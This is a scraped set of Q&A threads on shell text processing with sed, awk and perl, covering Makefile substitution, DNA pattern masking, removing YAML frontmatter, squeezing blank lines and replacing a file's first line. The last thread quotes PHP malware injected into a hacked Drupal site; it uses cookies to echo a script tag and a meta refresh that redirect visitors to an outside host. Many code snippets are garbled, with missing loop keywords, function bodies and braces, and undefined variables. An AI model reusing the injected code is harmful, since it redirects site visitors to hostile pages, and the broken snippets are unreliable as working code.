Parsing and accessing variables containing '$' in Makfile - sed

I have gotten myself into Makefile-hell :(
I have a file test.par containing values:
$ABC=123 ! some comment
$DEF=456 ! comment
and I have a template source file (actually in fortran, but that does not make a difference here) test/template.c:
int main(void) {
return $ABC+$DEF ;
and I want to set the values in the code, like a preprocessor would do. So I wrote a target in my Makefile like so:
for f in test/*; do \
while read l ; do \
key="$$(echo $$l | cut -d "=" -f 1 | tr -d ' ')";\
val=$$(echo $$l | cut -d "=" -f 2 | cut -d " " -f 1);\
[[ -z "$$val" ]] && \
val=$$(echo $$l | cut -d "=" -f 2 | cut -d " " -f 2);\
echo $$key $$val;\
cp $$f $$f.out ;\
sed -i "s/$$key/$$val/g" $$f.out;\
done < test.par;\
I go through every file in test/ (there are many) in the for loop and "apply" every line in test.par in the while loop.
The expected result is
int main(void) {
return 123+456 ;
What I get is
int main(void) {
return $ABC+456 ;
And now it is getting crazy: If I switch the to lines in the test.par file, I get:
int main(void) {
return 123+$DEF ;
If there are more lines, there no substitution at all.
What is wrong with me!!!???!!!
edit: I cannot make too many changes to the original code, so aI was hoping to solve this in the Makefile.

You keep reusing the original file for substitutions, so only the last one actually sticks (the result of all substitutions but the last is overwritten by the next). After
sed "s/$$key/$$val/g" $$f > $$f.out;\
cp "$$f.out" "$$f";\
to fix this. (Or make a working copy of $$f, if you want $$f unchanged, e.g., cp "$$f" "$$f.out" before the loop and use sed -i "s/$$key/$$val/g" "$$f.out" inside.)


Conditional substitution of patterns in bash strings depending on the beginning of a string

I am new in bash, so excuse me if do not use the right terms.
I need to substitute certain patterns of six characters in a set of files. The order by patterns are substituted depends on the beginning of each string of text.
This is an example of input:
chr1:123-123 etc is the name of the string, they are separated from the string I need to work with by a tab. The string I need to work with is delimited by characters 5 and 3, but I can change them.
I want that all patterns containing T, A, G in anyone of these orders is substituted with X: TTAGGG, TAGGG, AGGGTT, GGGTTA, GGTTAG, GTTAGG.
Similarly, patterns containing CTAGGG, like row 3, in orders similar to the previous one will be substituted with a different character.
The game is repeated with some specific differences for all the 6 characters composing each pattern.
I started writing something like this:
NORMAL=`echo "\033[m"`
RED=`echo "\033[31m"` #red
#read filename for the input file and create a copy and a folder for the output
read -p "Insert name for INPUT file: " INPUT
echo "Creating OUTPUT file " "${RED}"$INPUT"_sub.txt${NORMAL}"
mkdir -p ./"$INPUT"_OUTPUT
cp $INPUT.txt ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
#start the first set of instructions
#starting a second set of instructions to substitute pattern with one difference from TTAGGG
Instructions are
perfrep() {
sed -i -e 's/TTAGGG/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/TAGGGT/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/AGGGTT/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/GGGTTA/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/GGTTAG/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/GTTAGG/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
# starting a second set of instructions to substitute pattern with one difference from TTAGGG
sed -i -e 's/[GCA]TAGGG/L/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/G[GCA]TAGG/L/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/GG[GCA]TAG/L/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/GGG[GCA]TA/L/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/AGGG[GCA]T/L/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/TAGGG[GCA]/L/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
I will need to repeat also with T[GCA]AGGG, TT[TCG]GGG, TTA[ACT]GG, TTAG[ACT]G and TTAGG[ACT].
Using this procedure, I get for these results for the inputs shown
In my point of view, for my job, the first and second string are both made by X repeated five times, and the order of characters is just slightly different. On the other hand, the third one could be masked like this:
How do I tell the script that if the string starts with 5GGGTTA instead of 5TTAGGG must start to substitute with
sed -i -e 's/GGGTTA/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
instead of
sed -i -e 's/TTAGGG/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
I will need to repeat with all cases; for instance, if the string starts with GTTAGG I will need to start with
sed -i -e 's/GTTAGG/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
and so on, and add a couple of variation of my pattern.
I need to repeat the substitution with TTAGGG and the variations for all the rows of my input file.
Sorry for the very long question. Thank you all.
Adding information asked by Varun.
Patterns of 6 characters would be TTAGGG , [GCA]TAGGG , T[GCA]AGGG , TT[TCG]GGG , TTA[ACT]GG , TTAG[ACT]G , TTAGG[ACT].
Each one must be checked for a different frame, for instance for TTAGGG we have 6 frames TTAGGG , GTTAGG , GGTTAG, GGGTTA , AGGGTT , TAGGGT.
The same frames must be applied to the pattern containing a variable position.
I will have a total of 42 patterns to check, divided in 7 groups: one containing TTAGGG and derivative frames, 6 with the patterns with a variable position and their derivatives.
TTAGGG and derivatives are the most important and need to be checked first.
#! /usr/bin/awk -f
# generate a "frame" by moving the first char to the end
function rotate(base){ return substr(base,2) substr(base,1,1) }
# Unfortunately awk arrays do not store regexps
# so I am generating the list of derivative strings to match
function generate_derivative(frame,arr, i,j,k,head,read,tail) {
for(j=1; j<=length(frame); j++) {
for( k=1; k<=3; k++) {
# use a global index to simplify
arr[++Z]= head substr(snp[read],k,1) tail
# alternatives to a base
snp["A"]="TCG"; snp["T"]="ACG"; snp["G"]="ATC"; snp["C"]="ATG";
# the primary target
Z=1; # warning GLOBAL
X[Z] = frame;
# primary derivatives
generate_derivative(frame, X);
xn = Z;
# secondary shifted targets and their derivatives
for(i=1; i<length(frame); i++){
frame = rotate(frame);
L[++Z] = frame;
generate_derivative(frame, L);
/^chr[0-9:-]*\t5[ACTG]*3$/ {
# because we care about the order of the prinary matches
for (i=1; i<=xn; i++) {gsub(X[i],"X",$2)}
# since we don't care about the order of the secondary matches
for (hit in L) {gsub(L[hit],"L",$2)}
# print the matches in the order they are generated
#for (i=1; i<=xn; i++) {print X[i]};
#print ""
#for (i=1+xn; i<=Z; i++) {print L[i]};
IFF you can generate a static matching order you can live with then
something like the above Awk script could work. but you say the primary patterns should take precedence and that a secondary rule would be better applied first in some cases. (no can do).
If you need a more flexible matching pattern I would suggest looking at "recursive decent parsing with backtracking" Or "parsing expression grammars".
But then you are not in a bash shell anymore.

How to remove YAML frontmatter from markdown files?

I have markdown files that contain YAML frontmatter metadata, like this:
title: Something Somethingelse
author: Somebody Sometheson
But the YAML is of varying widths. Can I use a Posix command like sed to remove that frontmatter when it's at the beginning of a file? Something that just removes everything between --- and ---, inclusive, but also ignores the rest of the file, in case there are ---s elsewhere.
I understand your question to mean that you want to remove the first ----enclosed block if it starts at the first line. In that case,
sed '1 { /^---/ { :a N; /\n---/! ba; d} }' filename
This is:
1 { # in the first line
/^---/ { # if it starts with ---
:a # jump label for looping
N # fetch the next line, append to pattern space
/\n---/! ba; # if the result does not contain \n--- (that is, if the last
# fetched line does not begin with ---), go back to :a
d # then delete the whole thing.
# otherwise drop off the end here and do the default (print
# the line)
Depending on how you want to handle lines that begin with ---abc or so, you may have to change the patterns a little (perhaps add $ at the end to only match when the whole line is ---). I'm a bit unclear on your precise requirements there.
If you want to remove only the front matter, you could simply run:
sed '1{/^---$/!q;};1,/^---$/d' infile
If the first line doesn't match ---, sed will quit; else it will delete everything from the 1st line up to (and including) the next line matching --- (i.e. the entire front matter).
If you don't mind the "or something" being perl.
Simply print after two instances of "---" have been found:
perl -ne 'if ($i > 1) { print } else { /^---/ && $i++ }' yaml
or a bit shorter if you don't mind abusing ?: for flow control:
perl -ne '$i > 1 ? print : /^---/ && $i++' yaml
Be sure to include -i if you want to replace inline.
you use a bash file, create and make it executable using chmod +x and run it ./
#folder articles contains a lot of markdown files
for f in $files;
echo "${f##*/}"
#replace frontmatter title attribute to "title"
sed -i -r 's/^title: (.*)$/title: "\1"/' $f
This AWK based solution works for files with and without FrontMatter, doing nothing in the later case.
# Strips YAML FrontMattter from a file (usually Markdown).
# Exit immediately on each error and unset variable;
# see:
set -Ee
print_help() {
echo "Strips YAML FrontMattter from a file (usually Markdown)."
echo "Usage:"
echo " `basename $0` -h"
echo " `basename $0` --help"
echo " `basename $0` -i <file-with-front-matter>"
echo " `basename $0` --in-place <file-with-front-matter>"
echo " `basename $0` <file-with-front-matter> <file-to-be-without-front-matter>"
if [ -n "$1" ]
if [ "$1" = "-h" ] || [ "$1" = "--help" ]
exit 0
elif [ "$1" = "-i" ] || [ "$1" = "--in-place" ]
if [ -n "$2" ]
if $replace
awk -e '
/^---$/ {
if (is_first_line) {
if (! in_fm) {
print $0;
/^(---|...)$/ {
if (! is_first_line) {
' "$in_file" >> "$tmp_out_file"
if $replace
mv "$tmp_out_file" "$out_file"

comparison the content of a text and csv files

I need a sample bash script to compare a first line of a file(Result.txt) to first row and column of another file(table.csv), then send the result to an html file.
I am very basic in coding, this is what I found so far:
Result.txt="$(head -n 1 < $1|tail -n 1)"
table.csv="$(head -n 1 < $2|tail -n 1)"
test "$R.txt" = "$sheet.csv" && (echo The same; exit 0)
Appreciate your help
Slightly tweaking your script.
Res=$(head -n 1 "$1")
tab=$(head -n 1 "$2")
[[ $Res == $tab ]] && echo The same
"dot" is not a valid identifier (i.e. variable name) character: valid is letters, numbers and underscore, and the first character cannot be a number.
if you're doing head -1, there's no need to pipe that into tail -1
I think [[ is more readable than test, primarily because [[ forces you to have ]]
parentheses launch a subshell which is overkill for an echo statement.
the exit will only exit the subshell not your program
if you have multiple statements, use if ...; then ...; fi -- it's more readable.

How to delete multiple empty lines with SED?

I'm trying to compress a text document by deleting of duplicated empty lines, with sed. This is what I'm doing (to no avail):
sed -i -E 's/\n{3,}/\n/g' file.txt
I understand that it's not correct, according to this manual, but I can't figure out how to do it correctly. Thanks.
I think you want to replace spans of multiple blank lines with a single blank line, even though your example replaces multiple runs of \n with a single \n instead of \n\n. With that in mind, here are two solutions:
sed '/^$/{ :l
N; s/^\n$//; t l
p; d; }' input
In many implementations of sed, that can be all on one line, with the embedded newlines replaced by ;.
awk 't || !/^$/; { t = !/^$/ }'
As tripleee suggested above, I'm using Perl instead of sed:
perl -0777pi -e 's/\n{3,}/\n\n/g'
Use the translate function
tr -s '\n'
the -s or --squeeze-repeats reduces a sequence of repeated character to a single instance.
This is much better handled by tr -s '\n' or cat -s, but if you insist on sed, here's an example from section 4.17 of the GNU sed manual:
#!/usr/bin/sed -f
# on empty lines, join with next
# Note there is a star in the regexp
/^\n*$/ {
# now, squeeze all '\n', this can be also done by:
# s/^\(\n\)*/\1/
I am not sure this is what the OP wanted but using the awk solution by William Pursell here is the approach if you want to delete ALL empty lines in the file:
awk '!/^$/' file.txt
The awk pattern
is testing whether the current line is consisting only of the beginning of a line (symbolised by '^') and the end of a line (symbolised by '$'), in other words, whether the line is empty.
If this pattern is true awk applies its default and prints the current line.
I think OP wants to compress empty lines, e.g. where there are 9 consecutive emty lines, he wants to have just three.
I have written a little bash script that does just that:
#! /bin/bash
TOTALLINES="$(cat file.txt|wc -l)"
L2=$(($L1 + 1))
L3=$(($L1 +2))
if [[ $(cat file.txt|head -$L1|tail +$L1) == "" ]]||[[ $(cat file.txt|head -$L1|tail +$L1) == " " ]]
if [[ $(cat file.txt|head -$L2|tail +$L2) == "" ]]||[[ $(cat file.txt|head -$L2|tail +$L2) == " " ]]
if [[ $(cat file.txt|head -$L3|tail +$L3) == "" ]]||[[ $(cat file.txt|head -$L3|tail +$L3) == " " ]]
if [ $L1EMPTY = true ]&&[ $L2EMPTY = true ]&&[ $L3EMPTY = true ]
#do not cat line to temp file
echo "Skipping line "$CURRENTLINE
echo "$(cat file.txt|head -$CURRENTLINE|tail +$CURRENTLINE)">>temp.txt
echo "Writing line " $CURRENTLINE
cat temp.txt>file.txt
rm -r temp.txt
FINALTOTALLINES="$(cat file.txt|wc -l)"
echo "Deleted " $EMPTYLINELINT " empty lines."

sed, replace first line

I got hacked by running a really outdated Drupal installation (shame on me)
It seems they injected the following in every .php file;
<?php global $sessdt_o; if(!$sessdt_o) {
$sessdt_o = 1; $sessdt_k = "lb11";
if(!#$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if(!#headers_sent()) { #setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if(!#headers_sent()) {
#setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
$sessdt_p = "showimg";
Can I remove and replace this with sed? e.g.:
find . -name *.php | xargs ...
I hope to have the site working just for the time being to use wget and made a static copy.
You can use sed with something like
sed '1 s/^.*$/<?php/'
The 1 part only replaces the first line. Then, thanks to the s command, it replaces the whole line by <?php.
To modify your files in-place, use the -i option of GNU sed.
To replace the first line of a file, you can use the c (for "change") command of sed:
sed '1c<?php'
which translates to: "on line 1, replace the pattern space with <?php".
For this particular problem, however, something like this would probably work:
sed '1,/^$/c<?php'
which reads: change the range "line 1 to the first empty line" to <?php, thus replacing all injected code.
(The second part of the address (the regular expression /^$/) should be replaced with an expression that would actually delimit the injected code, if it is not an empty line.)
# replace only first line
printf 'a\na\na\n' | sed '1 s/a/b/'
printf 'a\na\na\n' | perl -pe '$. <= 1 && s/a/b/'
perl is needed for more complex regex,
for example regex lookaround (lookahead, lookbehind)
sample use:
patch shebang lines in script files to use /usr/bin/env
shebang line is the first line: #!/bin/bash etc
find . -type f -exec perl -p -i -e \
'$. <= 1 && s,^#!\s*(/usr)?/bin/(?!env)(.+)$,#!/usr/bin/env \2,' '{}' \;
this will replace #! /usr/bin/python3 with #!/usr/bin/env python3
to make the script more portable (nixos linux, ...)
the (?!env) (negative lookahead) prevents double-replacing
its not perfect, since #!/bin/env foo is not replaced with #!/usr/bin/env foo ...